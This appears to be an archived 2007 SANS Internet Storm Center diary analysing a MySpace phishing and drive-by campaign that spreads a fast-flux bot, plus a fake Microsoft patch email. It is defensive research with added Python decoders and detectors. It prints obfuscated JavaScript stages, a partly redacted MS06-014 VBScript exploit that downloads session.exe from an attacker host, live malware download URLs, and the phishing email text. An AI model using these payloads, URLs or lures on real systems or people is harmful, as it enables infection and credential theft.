SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-06-26

MySpace Phish and Drive-by attack vector propagating Fast Flux network growth

Published: 2007-06-26
Last Updated: 2007-06-29 23:14:38 UTC
by Johannes Ullrich (Version: 3)

UPDATE: Skip down to Section 2007-06-28

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits. The exploits install a version of "flux bot", a very popular proxy-network bot.

FluxBot, the agent behind so-called "fast-flux" networks, is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot is used as one of these proxies.

Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusa nbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

The actual exploit/malware is served via an existing flux network. *.dusanbut.com redirects the user to an encoded JavaScript which decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c .com/header_03.gif" width=1
height=1></iframe>

The domain used here is, of course, again served via flux. header_03.gif decodes to:

<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>



Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The exploit installs the .exe. For example (warning: live malware URLs, visit at your own risk):

http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

http://fcs.camgenie .com/weby7.exe

Settings for the bot can be found here:
http://settings.iconnectyou .biz

Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.

A couple of IPs that may be worth blocking:
AS13767   | 72.232.254.218
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86
AS25761   | 72.20.6.10

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger; this is work done by members of our great handler team.

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed, providing us with unique insight into the life cycle involved in propagating a fast flux service network. The attack vectors are:

  • Compromised MySpace member profiles redirecting to phishing sites (discussed above)
  • Malicious SWF (Flash) files that redirect the browser to a phishing page and drive-by browser exploit attempt

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />
</HEAD>
</HTML>

(The above URL is only a single example of potentially infinite permutations)

Following the above /da3e/index.php link results in a credible-looking MySpace landing page (served in flux), with the most interesting footer element shown below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="
../.footer_01.gif" width=0 height=0></iframe>

The IFrame loads /.footer_01.gif (not an actual GIF, but an encoded/obfuscated JavaScript snippet):

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>
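The two eval(unescape(...)) blocks above are the same trick twice: the first argument is nothing but hex-escaped source for a tiny decoder d(s), and the second argument is the real payload. As an added example (not code from the diary or the handlers' tooling), the following Python re-implements that decoder so the footer can be read without ever evaluating it in a browser: js_unescape() mimics JavaScript's unescape(), decode_stage2() is d(s) (walk the string backwards, XOR each character with 2, skip the leading pad byte), and defang() is a small helper of mine for pasting results into reports. The hex blob and both payloads are copied from the /.footer_01.gif listing above.

```python
import re

# First-stage blob from /.footer_01.gif above: eval(unescape("...")).
# Never eval it; unescape it and read the decoder it defines.
DECODER_BLOB = (
    "%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6"
    "6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%"
    "72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B"
    "%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"
)

# Second-stage payloads exactly as passed to d(unescape(...)) on the page
# (the JS literal's \" is a plain quote here).
PAYLOAD_STATUS = '%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>'
PAYLOAD_IFRAME = '%08<gocpdk-><3?vjekgj"3?jvfku" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq"gocpdk>'


def js_unescape(s):
    """Mimic JavaScript's unescape(): %uXXXX and %XX sequences become characters."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def decode_stage2(payload):
    """Re-implement d(s): walk the string backwards, XOR every char with 2.

    The JS loop is for(i=s.length-1;i>0;i--), so index 0 (the %08 pad byte)
    is never emitted; the 80-char chunking in d() only affects document.write().
    """
    s = js_unescape(payload)
    return ''.join(chr(ord(c) ^ 2) for c in s[:0:-1])


def defang(html):
    """Neutralise URLs (hxxp, host dots bracketed) before they land in a ticket."""
    def _one(m):
        host, sep, path = m.group(2).partition('/')
        return 'hxxp' + m.group(1) + '://' + host.replace('.', '[.]') + sep + path
    return re.sub(r'(?i)http(s?)://([^\s"\'<>]+)', _one, html)


if __name__ == '__main__':
    print(js_unescape(DECODER_BLOB))          # the decoder source, readable without eval
    print(decode_stage2(PAYLOAD_STATUS))
    print(defang(decode_stage2(PAYLOAD_IFRAME)))
```

The same three functions handle /header_03.gif and the head of /routine.php, which use the identical decoder; only the payload strings change.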

The IFrame loads /header_03.gif (served in flux), another encoded/obfuscated JavaScript file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

The decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame to /routine.php yields yet another encoded/obfuscated JavaScript file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of /routine.php is an attempt to exploit vulnerable Internet Explorer clients using the MDAC remote code execution vulnerability (MS06-014), for which Microsoft released a patch in April 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>

<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "
GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

A successful compromise of a Windows host via this exploit results in the download of a downloader stub (session.exe), which is then responsible for fetching the additional components needed to integrate the newly compromised host into the fast flux service network.

The stub (session.exe) attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to those evil Flash file redirects:

What follows is a representative sample of URLs for Flash files hosted on imageshack.us. Each performs one simple action: an ActionScript GetURL redirect to a fast-flux-hosted combination of phishing page and drive-by exploit that leverages the MDAC remote code execution vulnerability (MS06-014).

All files are identical (same MD5 and SHA1 for every file):

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

The Last-Modified time reported by the Imageshack HTTP server suggests a deployment time of 2007-06-05 03:56:30-0700.

Dumping one of the Flash files with swfdump reveals that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate: 120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
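The dump above shows the whole file is a single GetUrl action inside one DoAction tag. As an added example (not part of the diary and not the handlers' tooling), the following Python assembles an SWF with that same tag sequence and then parses it back, pulling every GetURL target out of every DoAction tag; it also accepts zlib-compressed CWS files, which the dump above did not need. The builder is a constructed stand-in for the imageshack files (so the byte count differs from the 98-byte original), the URL is the one swfdump reported, and the tag and action codes are from the published SWF file format.

```python
import struct
import zlib

TAG_END, TAG_SHOWFRAME, TAG_SETBACKGROUND, TAG_DOACTION = 0, 1, 9, 12
TAG_PROTECT, TAG_FILEATTRIBUTES = 24, 69
ACTION_GETURL = 0x83   # ActionGetURL: URL string, then target string, both NUL-terminated


def _tag(code, body):
    """Short tag record header: 10-bit tag code, 6-bit length (body < 63 bytes)."""
    assert len(body) < 63
    return struct.pack('<H', (code << 6) | len(body)) + body


def build_redirect_swf(url, target=''):
    """Constructed sample: a 1x1 pixel, 1-frame movie whose only action is GetURL."""
    rect = bytes([0x30, 0x0A, 0x00, 0xA0])          # RECT nbits=6, 0..20 twips = 1 px square
    body = rect + struct.pack('<HH', 120 << 8, 1)   # frame rate 120.0 (8.8 fixed), 1 frame
    geturl = url.encode() + b'\0' + target.encode() + b'\0'
    actions = bytes([ACTION_GETURL]) + struct.pack('<H', len(geturl)) + geturl + b'\0'  # trailing \0 = ActionEnd
    body += (_tag(TAG_FILEATTRIBUTES, b'\0\0\0\0') + _tag(TAG_SETBACKGROUND, b'\xff\xff\xff')
             + _tag(TAG_PROTECT, b'') + _tag(TAG_DOACTION, actions)
             + _tag(TAG_SHOWFRAME, b'') + _tag(TAG_END, b''))
    return b'FWS' + bytes([8]) + struct.pack('<I', 8 + len(body)) + body


def to_cws(swf):
    """Compress an FWS file the way Flash does: 8-byte header stays clear, rest is zlib."""
    return b'CWS' + swf[3:8] + zlib.compress(swf[8:])


def _geturls_in_actions(actions):
    """Walk an action record list; records with code >= 0x80 carry a 16-bit length."""
    out, p = [], 0
    while p < len(actions):
        code = actions[p]; p += 1
        if code == 0:                                   # ActionEnd
            break
        length = 0
        if code & 0x80:
            length = struct.unpack_from('<H', actions, p)[0]; p += 2
        data = actions[p:p + length]; p += length
        if code == ACTION_GETURL:
            url, _, rest = data.partition(b'\0')
            out.append((url.decode('latin-1'), rest.split(b'\0')[0].decode('latin-1')))
    return out


def extract_geturls(swf):
    """Return [(url, target), ...] from every DoAction tag of an FWS or CWS file."""
    sig = swf[:3]
    if sig == b'CWS':
        swf = swf[:8] + zlib.decompress(swf[8:])
    elif sig != b'FWS':
        raise ValueError('not an SWF file')
    nbits = swf[8] >> 3                                 # RECT field width
    pos = 8 + (5 + 4 * nbits + 7) // 8 + 2 + 2          # skip RECT, frame rate, frame count
    urls = []
    while pos + 2 <= len(swf):
        hdr = struct.unpack_from('<H', swf, pos)[0]; pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                              # long record header
            length = struct.unpack_from('<I', swf, pos)[0]; pos += 4
        body = swf[pos:pos + length]; pos += length
        if code == TAG_DOACTION:
            urls.extend(_geturls_in_actions(body))
        if code == TAG_END:
            break
    return urls


if __name__ == '__main__':
    sample = build_redirect_swf('http://www.e447aa2.com')
    print(len(sample), 'bytes;', extract_geturls(sample))
```

Pointing extract_geturls() at the files downloaded from the imageshack URLs below would flag them in bulk; anything a GetURL points at that is not the hosting site's own domain deserves the same scrutiny as the one above.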

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several hundred MySpace profiles were discovered injected with links to phishing sites, and it is easy to imagine that many more were affected. Note that in every hostname below the actual registered domain is the last two labels; everything in front of it merely imitates a MySpace URL.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com
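Every hostname in the list above, like the meta-refresh target in the 2007-06-28 section, puts the real registered domain in the last two labels and stacks MySpace-looking labels in front of it. As an added example (not the handlers' code), the following Python extracts the redirect target from a meta-refresh landing page and classifies a URL by whether brand tokens appear in the subdomain of a domain the brand does not own. The landing page and hostnames are constructed to match the pattern on this page; the attacker domains are placeholders under .invalid rather than the live ones, the brand token list is my own, and the registrable-domain split is deliberately naive (last two labels) and should use the Public Suffix List in production.

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: the brand's only legitimate registrable domain.
BRAND_DOMAINS = {'myspace.com'}
# Tokens the phish sprinkles into hostnames so the address bar looks like a MySpace URL.
BRAND_TOKENS = ('myspace', 'fuseaction', 'mytoken')

META_REFRESH = re.compile(
    r'<meta\s+http-equiv=["\']?refresh["\']?\s+content=["\']\s*\d+\s*;\s*url=([^"\'>]+)', re.I)

# Constructed landing page in the shape of the GET result shown above.
SAMPLE_LANDING = """<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.myspace.cfm.fuseaction.splash.mytoken.76701a26.da3e.44a3a17b.flux-example.invalid/da3e/index.php" />
</HEAD>
</HTML>"""


def extract_refresh_url(html):
    """Pull the target out of a <meta http-equiv="refresh"> page, or None."""
    m = META_REFRESH.search(html)
    return m.group(1).strip() if m else None


def registrable_domain(host):
    """Split a hostname into (owner domain, list of subdomain labels).

    Naive on purpose: the last two labels. Use the Public Suffix List in
    production, otherwise foo.co.uk comes out as 'co.uk'.
    """
    labels = host.lower().rstrip('.').split('.')
    return '.'.join(labels[-2:]), labels[:-2]


def assess_url(url):
    """Classify a URL by where the brand name sits relative to the owner domain."""
    host = urlsplit(url).hostname or ''
    domain, sub = registrable_domain(host)
    hits = [t for t in BRAND_TOKENS if any(t in label for label in sub)]
    if domain in BRAND_DOMAINS:
        verdict = 'brand-owned'
    elif hits:
        verdict = 'brand-in-subdomain'      # the pattern every hostname above follows
    else:
        verdict = 'unknown'
    return {'host': host, 'domain': domain, 'subdomain_labels': len(sub),
            'brand_tokens': hits, 'verdict': verdict}


if __name__ == '__main__':
    target = extract_refresh_url(SAMPLE_LANDING)
    print(assess_url(target))
    print(assess_url('http://home.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.phish-example.invalid/login.php'))
    print(assess_url('http://home.myspace.com/index.cfm?fuseaction=user&MyToken=abc'))
```

Run over a proxy log, 'brand-in-subdomain' hits with nine or ten subdomain labels are the ones worth pulling the DNS answers for.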

Flux!  It's SO easy to miss!

This write-up is not meant to give the more complex overview of what a fast flux service network is (that is forthcoming). Essentially all URLs involved in this fast flux service network are served by compromised hosts that proxy their HTTP and DNS traffic to an upstream "mothership" host. Note the short TTL (179 seconds) and the consumer DSL/cable reverse names on every address in the answer section below:

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Re-run the above DNS query a little later (the same goes for any domain referenced above) and the concept of flux may unfold before your very eyes. The domain's authoritative name servers:

;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.
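A single dig answer already carries the tells described above: a TTL under five minutes, addresses scattered across unrelated ISP networks, and reverse names from consumer DSL and cable pools. As an added example (not the handlers' tooling), this Python scores an answer section for those three properties and diffs two snapshots of the same name to show the churn the text invites you to watch for. The first sample is the at6pyss.com answer shown above with its bracketed rDNS annotations; the static counter-example and the second snapshot are constructed, and the residential-rDNS regex and the thresholds are heuristics of mine.

```python
import ipaddress
import re

# Answer section from above (handler's rDNS annotation kept in brackets), used as sample input.
FLUX_ANSWER = """\
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]
"""

# Constructed counter-example: an ordinary hosted site, one address, day-long TTL.
STATIC_ANSWER = "www.static.example.     86400   IN      A       192.0.2.10\n"

RR_LINE = re.compile(r'^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d+(?:\.\d+){3})'
                     r'(?:\s+\[(?P<ptr>[^\]]*)\])?')
# rDNS naming conventions typical of consumer broadband pools (heuristic, not exhaustive).
RESIDENTIAL = re.compile(r'dsl|cable|ppp|hsd\d|cpe-|\.res\.|dyn', re.I)


def parse_a_records(text):
    """Return [(ttl, ip, rdns)] for every A record line in dig-style output."""
    recs = []
    for line in text.splitlines():
        m = RR_LINE.match(line.strip())
        if m:
            recs.append((int(m['ttl']), m['ip'], m['ptr'] or ''))
    return recs


def assess_flux(text, max_ttl=300, min_prefixes=5, min_residential=0.5):
    """Score one answer for the fast-flux tells: short TTL, many unrelated
    /16 networks, and a high share of residential-looking reverse names."""
    recs = parse_a_records(text)
    if not recs:
        raise ValueError('no A records found')
    min_ttl = min(ttl for ttl, _, _ in recs)
    prefixes = {ipaddress.ip_network(f'{ip}/16', strict=False) for _, ip, _ in recs}
    residential = sum(1 for _, _, ptr in recs if RESIDENTIAL.search(ptr)) / len(recs)
    flags = {
        'low_ttl': min_ttl <= max_ttl,
        'many_prefixes': len(prefixes) >= min_prefixes,
        'residential_rdns': residential >= min_residential,
    }
    return {'records': len(recs), 'min_ttl': min_ttl, 'distinct_16s': len(prefixes),
            'residential_fraction': round(residential, 2), 'flags': flags,
            'fast_flux': all(flags.values())}


def churn(previous, current):
    """Compare two snapshots of the same name: (added, removed) address sets.
    A flux domain rotates most of its set within a few TTLs; a static one does not."""
    prev = {ip for _, ip, _ in parse_a_records(previous)}
    curr = {ip for _, ip, _ in parse_a_records(current)}
    return curr - prev, prev - curr


if __name__ == '__main__':
    print(assess_flux(FLUX_ANSWER))
    print(assess_flux(STATIC_ANSWER))
```

Feeding churn() the output of the same dig command run a few minutes apart is the programmatic version of "check back on the above DNS results".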

FAKE Microsoft patch email -> Fake Spyware Doctor!

Published: 2007-06-26
Last Updated: 2007-06-28 20:03:11 UTC
by donald smith (Version: 4)

Several of our readers reported an email that led to a fake Microsoft patch being spammed on the net today. The emails had the recipients' full names and, in one case, the company they worked for in the body of the email. So far I have seen 4 different URLs. We are working on getting the systems hosting the malware cleaned or shut down. We have submitted the malware itself to most of the AV vendors, so detection should improve, but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the licence key is not in the right format for XP or Outlook.

Microsoft pointed us to a couple of web pages they maintain that should help you recognize fraudulent email here and here.

One of the submitters, "PatrickC", provided the following email for a fake Microsoft patch and malware site.

“The following email I received is new to me. The URL points to
hxxp://fake.microsoft.site./
MSOUTRC2007Update-KB863892.exe
Bye.”
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :

REG ISTERED TO : Patrick
Licence KEY : XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

Thank you

Microsoft Corp.

=====================================

From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.
    * Modifies other process memory.
    * Creates a remote thread.
[ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\sdoctor.exe (20480 bytes) : no signature detection.

We notified one of the support teams at a hosting provider that a virus was found on one of their customers' systems.

Their auto-responder replied within a minute.
A support person removed the malware and responded within 30 minutes.
When I tried to verify that, I found the malware was still there, or back.
When I notified the hosting provider that the malware was back, the support person analyzed logs, determined it was being uploaded via FTP, and immediately disabled the FTP account involved.


One of our readers provided this detection list.

AntiVir             HEUR/Crypted
Avast!              --
AVG                 Downloader.Agent.MPF
A-Squared           --
Bitdefender         Trojan.Downloader.Small.AABU
ClamAV              --
Command AV          W32/Warezov.gen3!W32DL
Dr Web              Trojan.DownLoader.24763
eSafe               --
eTrust              Win32/Smynoc
Ewido               --
F-Prot              W32/Warezov.gen3!W32DL
F-Secure            Trojan-Downloader.Win32.Agent.bvy
Fortinet            W32/Agent.BVY!tr.dldr
Ikarus              --
Kaspersky           Trojan-Downloader.Win32.Agent.bvy
McAfee              Generic Downloader.ak trojan
Microsoft           Trojan:Win32/Agent.gen!C
Nod32               Win32/TrojanDownloader.Agent.ACS
Norman              W32/Malware (Sandbox)
Panda               Suspicious file
QuickHeal           --
Rising AV           --
Sophos              Mal/Behav-112
Spybot S&D          Smitfraud-C.,,Installer
Symantec            -- (BETA: Downloader)
Trend Micro         -- (BETA: TROJ_AGENT.VII)
VBA32               --
VirusBuster         --
WebWasher           Heuristic.Crypted


UPDATE:
Several users have reported that this is only being sent to IT accounts, and mostly high-level IT accounts.

There is a new version of the binary.

MD5 = 0b4a130e2f124e780947fc4a36e0a556

They changed the name of the binary and the registry entries:

systemmechanic.exe
SystemMechanic


Microsoft Re-Releases MS07-022

Published: 2007-06-26
Last Updated: 2007-06-26 19:25:09 UTC
by Scott Fendley (Version: 1)

